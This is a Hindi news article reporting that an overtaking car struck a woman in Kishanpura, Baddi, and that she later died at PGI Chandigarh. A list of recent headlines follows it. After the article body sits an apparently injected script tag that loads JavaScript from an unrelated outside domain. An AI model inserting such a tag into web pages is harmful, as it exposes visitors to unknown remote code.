बद्दी के किशनपुरा में ओवरटेक करते हुए कार ने सड़क क्रॉस कर रही महिला को मारी टक्कर

<p>हिमाचल प्रदेश के सबसे बड़े औद्योगिक क्षेत्र बद्दी के तहत किशनपुरा में एक दर्दनाक सड़क हादसा होने का मामला सामने आया है। बताया जा रहा है कि जैसे ही एक महिला सड़क को क्रॉस करने के लिए सड़क की ओर आई तो दूसरी ओर साइड से एक कार को ओवरटेक करते हुए दूसरी कार ने महिला को बुरी तरह से टक्कर मार दी। हादसे में महिला पहले सड़क पर गिर गई और उसके बाद स्थानीय लोगों द्वारा बेहोशी की हालत में महिला को उठाकर दूसरे किनारे लाया गया।</p>

<p>आपको बता दें कि इस पूरी घटना की वीडियो सड़क के साथ लगे एक सीसीटीवी कैमरे में कैद हो गई। हादसे में महिला बेहोश होकर सड़क पर ही गिर जाती है और उसे स्थानीय लोगों द्वारा उठाकर एक साइड किया जाता है। महिला को उसी कार सवार द्वारा इलाज के लिए पहले बद्दी के एक अस्पताल में लगाया लाया जाता है। उसके बाद वहां से महिला की हालत को गंभीर देखते हुए उसे पीजीआई चंडीगढ़ रेफर कर दिया जाता है। घटना सीसीटीवी के आधार पर 12 जून की बताई जा रही है और 15 जून को महिला ने पीजीआई चंडीगढ़ में इलाज के दौरान दम तोड़ दिया ।</p>

<p>मामले की पुष्टि करते हुए ग्राम पंचायत किशनपुरा के प्रधान सूजन सैनी ने बताया कि बस स्टैंड के साथ में यह हादसा हुआ था। जिसमें एक कार ने महिला को टक्कर मारी थी और वही कार सवार उस महिला का 2 दिन से पीजीआई चंडीगढ़ में इलाज करवा रहा था। उन्होंने कहा कि 15 जून को महिला की पीजीआई चंडीगढ़ में इलाज के दौरान मौत हो गई है। मृतक महिला की उम्र करीब 50 वर्ष थी जो कि अपने पूरे परिवार के साथ की किशनपुरा में ही एक किराए के मकान में रह रही थी और वह एक निजी कंपनी में काम कर रही थी।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

बिझडी बाजार में कार और स्कूटी में टक्‍कर, मचा बवाल

  Hamirpur: उपमंडल बड़सर के बिझडी बाजार में उस समय अफरा तफरी का माहौल बन…

13 hours ago

Kangana Ranaut: सत्ता पाने के लिए देश के विभाजन से भी नहीं हिचकिचाते राहुल गांधी

  Mandi:खड्गे और जेपी नड्डा की पत्रवार के बीच मंडी से भाजपा सांसद और एक्‍ट्रेस…

13 hours ago

राजनीति में घुला जहर, पीएम रखें पद की गरिमा: प्रियंका

Shimla: शिमला में छुट्टियां बिता रहीं कांग्रेस की राष्ट्रीय महासचिव प्रियंका गांधी ने शुक्रवार को…

13 hours ago

राजनीति में घुला जहर, पीएम रखें पद की गरिमा: प्रियंका

  Shimla: शिमला में छुट्टियां बिता रहीं कांग्रेस की राष्ट्रीय महासचिव प्रियंका गांधी ने शुक्रवार…

13 hours ago

Uttar Pradesh: जमानत पर रिहा दुष्कर्म के आरोपी ने पीड़िता की गोली मारकर हत्या की

UP: दुष्कर्म का आरोपी और जमानत पर जेल से बाहर आए एक व्यक्ति ने दुष्कर्म…

14 hours ago

पेंशनरों की मांगों पर मुख्यमंत्री को ज्ञापन, सुधार की गुहार

  Nahan/Hamirpur: राज्‍य कार्यकारिणी के आह्वान पर अपनी मांगों को पेंशनरों ने जिला मुख्‍यालयों में…

14 hours ago